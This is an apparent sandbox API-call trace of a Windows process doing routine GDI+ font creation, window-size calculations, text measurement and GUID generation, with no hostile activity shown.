[0126.593] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277ef44) returned 0x0
[0126.593] GetLastError () returned 0x0
[0126.593] GdipGetFontSize (font=0x657f4a8, size=0x277ef48) returned 0x0
[0126.593] GetLastError () returned 0x0
[0126.593] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.593] GetLastError () returned 0x0
[0126.593] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.593] GetLastError () returned 0x0
[0126.594] GdipGetFontHeight (font=0x657f4a8, graphics=0x657f4d0, height=0x19dd30) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.594] GetLastError () returned 0x0
[0126.594] GdipDeleteGraphics (graphics=0x657f4d0) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.594] GetLastError () returned 0x0
[0126.594] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.594] GetLastError () returned 0x0
[0126.594] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] GdipGetFontHeight (font=0x657f4a8, graphics=0x657f4d0, height=0x19dcc4) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.595] GetLastError () returned 0x0
[0126.595] GdipDeleteGraphics (graphics=0x657f4d0) returned 0x0
[0126.595] GetLastError () returned 0x0
[0126.595] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.595] GetLastError () returned 0x0
[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
[0126.595] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
[0126.595] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
[0126.595] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.596] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.596] GetLastError () returned 0x0
[0126.596] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f14c) returned 0x0
[0126.596] GetLastError () returned 0x0
[0126.596] GdipGetFontSize (font=0x657f4d0, size=0x277f150) returned 0x0
[0126.596] GetLastError () returned 0x0
[0126.596] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.596] GetLastError () returned 0x0
[0126.596] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.597] GetLastError () returned 0x0
[0126.597] GdipGetFontHeight (font=0x657f4d0, graphics=0x657f4f8, height=0x19dd30) returned 0x0
[0126.597] GetLastError () returned 0x0
[0126.597] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.597] GetLastError () returned 0x0
[0126.597] GdipDeleteGraphics (graphics=0x657f4f8) returned 0x0
[0126.597] GetLastError () returned 0x0
[0126.597] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.597] GetLastError () returned 0x0
[0126.597] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.597] GetLastError () returned 0x0
[0126.597] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.598] GetLastError () returned 0x0
[0126.598] GdipGetFontHeight (font=0x657f4d0, graphics=0x657f4f8, height=0x19dcc4) returned 0x0
[0126.598] GetLastError () returned 0x0
[0126.598] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.598] GetLastError () returned 0x0
[0126.598] GdipDeleteGraphics (graphics=0x657f4f8) returned 0x0
[0126.598] GetLastError () returned 0x0
[0126.598] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.598] GetLastError () returned 0x0
[0126.598] GetSystemMetrics (nIndex=5) returned 1
[0126.598] GetSystemMetrics (nIndex=6) returned 1
[0126.598] GetSystemMetrics (nIndex=5) returned 1
[0126.598] GetSystemMetrics (nIndex=6) returned 1
[0126.598] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.598] GetSystemMetrics (nIndex=5) returned 1
[0126.598] GetSystemMetrics (nIndex=6) returned 1
[0126.599] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.599] GetSystemMetrics (nIndex=5) returned 1
[0126.599] GetSystemMetrics (nIndex=6) returned 1
[0126.599] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.600] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.600] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f354) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.600] GdipGetFontSize (font=0x657f4f8, size=0x277f358) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.600] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.600] GetLastError () returned 0x0
[0126.600] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.601] GdipGetFontHeight (font=0x657f4f8, graphics=0x657f520, height=0x19dd30) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.601] GetLastError () returned 0x0
[0126.601] GdipDeleteGraphics (graphics=0x657f520) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.601] GetLastError () returned 0x0
[0126.601] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.601] GetLastError () returned 0x0
[0126.601] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] GdipGetFontHeight (font=0x657f4f8, graphics=0x657f520, height=0x19dcc4) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.602] GetLastError () returned 0x0
[0126.602] GdipDeleteGraphics (graphics=0x657f520) returned 0x0
[0126.602] GetLastError () returned 0x0
[0126.602] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.602] GetLastError () returned 0x0
[0126.602] GetSystemMetrics (nIndex=5) returned 1
[0126.602] GetSystemMetrics (nIndex=6) returned 1
[0126.602] GetSystemMetrics (nIndex=5) returned 1
[0126.602] GetSystemMetrics (nIndex=6) returned 1
[0126.602] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.602] GetSystemMetrics (nIndex=5) returned 1
[0126.602] GetSystemMetrics (nIndex=6) returned 1
[0126.602] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.603] GetSystemMetrics (nIndex=5) returned 1
[0126.603] GetSystemMetrics (nIndex=6) returned 1
[0126.603] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.604] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.604] GetLastError () returned 0x0
[0126.604] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f6a4) returned 0x0
[0126.604] GetLastError () returned 0x0
[0126.604] GdipGetFontSize (font=0x657f520, size=0x277f6a8) returned 0x0
[0126.604] GetLastError () returned 0x0
[0126.607] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.607] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.615] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.615] GetLastError () returned 0x0
[0126.615] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f980) returned 0x0
[0126.615] GetLastError () returned 0x0
[0126.615] GdipGetFontSize (font=0x657f548, size=0x277f984) returned 0x0
[0126.615] GetLastError () returned 0x0
[0126.615] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.615] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.616] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.616] GetLastError () returned 0x0
[0126.616] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277fb24) returned 0x0
[0126.616] GetLastError () returned 0x0
[0126.616] GdipGetFontSize (font=0x657f570, size=0x277fb28) returned 0x0
[0126.616] GetLastError () returned 0x0
[0126.616] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.619] GetLastError () returned 0x0
[0126.619] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.620] GdipGetFontHeight (font=0x657f570, graphics=0x657f598, height=0x19dd30) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.620] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.620] GetLastError () returned 0x0
[0126.620] GdipDeleteGraphics (graphics=0x657f598) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.620] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.620] GetLastError () returned 0x0
[0126.620] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.620] GetLastError () returned 0x0
[0126.620] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.621] GdipGetFontHeight (font=0x657f570, graphics=0x657f598, height=0x19dcc4) returned 0x0
[0126.621] GetLastError () returned 0x0
[0126.621] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.621] GetLastError () returned 0x0
[0126.621] GdipDeleteGraphics (graphics=0x657f598) returned 0x0
[0126.621] GetLastError () returned 0x0
[0126.621] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.621] GetLastError () returned 0x0
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.622] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.622] GetLastError () returned 0x0
[0126.623] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277fdcc) returned 0x0
[0126.623] GetLastError () returned 0x0
[0126.623] GdipGetFontSize (font=0x657f598, size=0x277fdd0) returned 0x0
[0126.623] GetLastError () returned 0x0
[0126.623] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.623] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.624] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.624] GetLastError () returned 0x0
[0126.624] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x278001c) returned 0x0
[0126.624] GetLastError () returned 0x0
[0126.624] GdipGetFontSize (font=0x657f8e0, size=0x2780020) returned 0x0
[0126.624] GetLastError () returned 0x0
[0126.624] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.624] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.626] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.626] GetLastError () returned 0x0
[0126.626] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27801dc) returned 0x0
[0126.626] GetLastError () returned 0x0
[0126.626] GdipGetFontSize (font=0x657f7c8, size=0x27801e0) returned 0x0
[0126.626] GetLastError () returned 0x0
[0126.626] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.626] GetLastError () returned 0x0
[0126.626] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.627] GdipGetFontHeight (font=0x657f7c8, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.627] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.627] GetLastError () returned 0x0
[0126.627] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.627] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.627] GetLastError () returned 0x0
[0126.627] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.627] GetLastError () returned 0x0
[0126.627] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.628] GdipGetFontHeight (font=0x657f7c8, graphics=0x657f9c8, height=0x19dcc4) returned 0x0
[0126.628] GetLastError () returned 0x0
[0126.628] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.628] GetLastError () returned 0x0
[0126.628] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.628] GetLastError () returned 0x0
[0126.628] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.628] GetLastError () returned 0x0
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.630] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.630] GetLastError () returned 0x0
[0126.630] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780474) returned 0x0
[0126.630] GetLastError () returned 0x0
[0126.630] GdipGetFontSize (font=0x657f868, size=0x2780478) returned 0x0
[0126.630] GetLastError () returned 0x0
[0126.630] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.630] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.632] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.632] GetLastError () returned 0x0
[0126.632] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27806c4) returned 0x0
[0126.632] GetLastError () returned 0x0
[0126.632] GdipGetFontSize (font=0x657f7f0, size=0x27806c8) returned 0x0
[0126.632] GetLastError () returned 0x0
[0126.632] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.632] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.634] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.634] GetLastError () returned 0x0
[0126.634] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780914) returned 0x0
[0126.634] GetLastError () returned 0x0
[0126.634] GdipGetFontSize (font=0x657f890, size=0x2780918) returned 0x0
[0126.634] GetLastError () returned 0x0
[0126.634] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.634] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.659] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.659] GetLastError () returned 0x0
[0126.659] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780b50) returned 0x0
[0126.659] GetLastError () returned 0x0
[0126.660] GdipGetFontSize (font=0x657f818, size=0x2780b54) returned 0x0
[0126.660] GetLastError () returned 0x0
[0126.661] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.662] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.665] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.665] GetLastError () returned 0x0
[0126.665] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780d60) returned 0x0
[0126.665] GetLastError () returned 0x0
[0126.665] GdipGetFontSize (font=0x657f5e8, size=0x2780d64) returned 0x0
[0126.665] GetLastError () returned 0x0
[0126.665] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.665] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.667] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.667] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780ef4) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.667] GdipGetFontSize (font=0x657f6d8, size=0x2780ef8) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.667] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.667] GetLastError () returned 0x0
[0126.667] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.668] GdipGetFontHeight (font=0x657f6d8, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.668] GetLastError () returned 0x0
[0126.668] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.668] GetLastError () returned 0x0
[0126.668] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.668] GetLastError () returned 0x0
[0126.668] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.668] GetLastError () returned 0x0
[0126.708] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.708] GetLastError () returned 0x0
[0126.708] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc08) returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] GdipGetFontHeight (font=0x657f6d8, graphics=0x657f9c8, height=0x19dc00) returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.709] GetLastError () returned 0x0
[0126.709] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.709] GetLastError () returned 0x0
[0126.709] GdipGetFamilyName (in: family=0x65769f0, name=0x7a8160, language=0x409 | out: name="Segoe UI") returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] GetDeviceCaps (hdc=0x380106da, index=90) returned 96
[0126.709] GetLastError () returned 0x0
[0126.710] CreateFontIndirectW (lplf=0x73db10) returned 0x780a0998
[0126.710] GetLastError () returned 0x0
[0126.710] GetObjectW (in: h=0x780a0998, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0126.710] GetLastError () returned 0x0
[0126.710] SelectObject (hdc=0x380106da, h=0x780a0998) returned 0x2a0a0693
[0126.710] GetLastError () returned 0x0
[0126.710] GetMapMode (hdc=0x380106da) returned 1
[0126.710] GetLastError () returned 0x0
[0126.710] GetTextMetricsW (in: hdc=0x380106da, lptm=0x19dae8 | out: lptm=0x19dae8) returned 1
[0126.711] GetLastError () returned 0x0
[0126.711] DrawTextExW (in: hdc=0x380106da, lpchText="j^", cchText=2, lprc=0x19dbf4, format=0x420, lpdtp=0x2781274 | out: lpchText="j^", lprc=0x19dbf4) returned 25
[0126.737] GetLastError () returned 0x0
[0126.744] GdipGetFamilyName (in: family=0x65769f0, name=0x7a8160, language=0x409 | out: name="Segoe UI") returned 0x0
[0126.744] GetLastError () returned 0x0
[0126.744] GetDeviceCaps (hdc=0x380106da, index=90) returned 96
[0126.745] GetLastError () returned 0x0
[0126.745] CreateFontIndirectW (lplf=0x73db10) returned 0x2d0a09b1
[0126.745] GetLastError () returned 0x0
[0126.745] GetObjectW (in: h=0x2d0a09b1, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0126.745] GetLastError () returned 0x0
[0126.768] GetTextExtentPoint32W (in: hdc=0x380106da, lpString="0", c=1, psizl=0x27813c4 | out: psizl=0x27813c4) returned 1
[0126.769] GetLastError () returned 0x0
[0126.846] DeleteObject (ho=0x2d0a09b1) returned 1
[0126.846] GetLastError () returned 0x0
[0126.847] GetSystemMetrics (nIndex=45) returned 2
[0126.847] GetSystemMetrics (nIndex=46) returned 2
[0126.849] GetSystemMetrics (nIndex=7) returned 3
[0126.849] GetSystemMetrics (nIndex=8) returned 3
[0126.852] AdjustWindowRectEx (in: lpRect=0x19dcfc, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcfc) returned 1
[0126.854] AdjustWindowRectEx (in: lpRect=0x19dcfc, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcfc) returned 1
[0126.903] CoCreateGuid (in: pguid=0x19d544 | out: pguid=0x19d544*(Data1=0x5913eb50, Data2=0x520c, Data3=0x4070, Data4=([0]=0x8f, [1]=0x2e, [2]=0xd2, [3]=0x53, [4]=0x25, [5]=0x27, [6]=0x6, [7]=0x8b))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d534 | out: pguid=0x19d534*(Data1=0x7707feb5, Data2=0x953c, Data3=0x4d85, Data4=([0]=0xbe, [1]=0x47, [2]=0xe2, [3]=0xa5, [4]=0xf0, [5]=0xae, [6]=0xc2, [7]=0xe3))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d524 | out: pguid=0x19d524*(Data1=0xb7e5b945, Data2=0x3351, Data3=0x4635, Data4=([0]=0x9f, [1]=0x71, [2]=0x25, [3]=0xb3, [4]=0xdd, [5]=0x4d, [6]=0x13, [7]=0x8a))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d514 | out: pguid=0x19d514*(Data1=0x91472553, Data2=0x19c3, Data3=0x4de1, Data4=([0]=0x8b, [1]=0x41, [2]=0xf8, [3]=0xfe, [4]=0xb3, [5]=0x7d, [6]=0xa9, [7]=0x7b))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d504 | out: pguid=0x19d504*(Data1=0x9edc5923, Data2=0xfa4a, Data3=0x42c7, Data4=([0]=0x92, [1]=0x7, [2]=0x39, [3]=0xd, [4]=0x3e, [5]=0xe0, [6]=0x39, [7]=0x9d))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4f4 | out: pguid=0x19d4f4*(Data1=0x7e3fa42b, Data2=0xa2de, Data3=0x4f2b, Data4=([0]=0x93, [1]=0xbe, [2]=0xa6, [3]=0x4d, [4]=0x1a, [5]=0x82, [6]=0x4f, [7]=0x48))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4e4 | out: pguid=0x19d4e4*(Data1=0xb389efcf, Data2=0xf2fb, Data3=0x4cfd, Data4=([0]=0x91, [1]=0x4d, [2]=0x50, [3]=0xfb, [4]=0xb8, [5]=0xb1, [6]=0x61, [7]=0x49))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4d4 | out: pguid=0x19d4d4*(Data1=0x8824f174, Data2=0xb0ac, Data3=0x439d, Data4=([0]=0x80, [1]=0x2f, [2]=0xbc, [3]=0xa6, [4]=0xcf, [5]=0xd, [6]=0x62, [7]=0x95))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4c4 | out: pguid=0x19d4c4*(Data1=0x41ab7909, Data2=0xa843, Data3=0x4906, Data4=([0]=0x98, [1]=0xed, [2]=0xc0, [3]=0x33, [4]=0xa3, [5]=0x31, [6]=0x2c, [7]=0xc5))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4b4 | out: pguid=0x19d4b4*(Data1=0x917ccbe, Data2=0x7fd4, Data3=0x412c, Data4=([0]=0xbf, [1]=0xe2, [2]=0xc4, [3]=0xa2, [4]=0x7d, [5]=0xe1, [6]=0xa3, [7]=0x71))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4a4 | out: pguid=0x19d4a4*(Data1=0x6cd51311, Data2=0x7b43, Data3=0x48a1, Data4=([0]=0x9a, [1]=0x5b, [2]=0xcd, [3]=0xb6, [4]=0x8e, [5]=0xc1, [6]=0x35, [7]=0xea))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d494 | out: pguid=0x19d494*(Data1=0x3e255e00, Data2=0x4399, Data3=0x4977, Data4=([0]=0xa1, [1]=0xec, [2]=0xb0, [3]=0x1a, [4]=0x67, [5]=0xca, [6]=0xcc, [7]=0xcf))) returned 0x0
[0126.905] CoCreateGuid (in: pguid=0x19d514 | out: pguid=0x19d514*(Data1=0xc563efd5, Data2=0xc9b4, Data3=0x4ad1, Data4=([0]=0x98, [1]=0x54, [2]=0x97, [3]=0x91, [4]=0xc2, [5]=0xfd, [6]=0x87, [7]=0xc7))) returned 0x0
[0126.905] CoCreateGuid (in: pguid=0x19d504 | out: pguid=0x19d504*(Data1=0xbed7cd6d, Data2=0x28f6, Data3=0x4503, Data4=([0]=0x95, [1]=0xe6, [2]=0xa8, [3]=0x53, [4]=0xe7, [5]=0xf5, [6]=0x61, [7]=0xd2))) returned 0x0
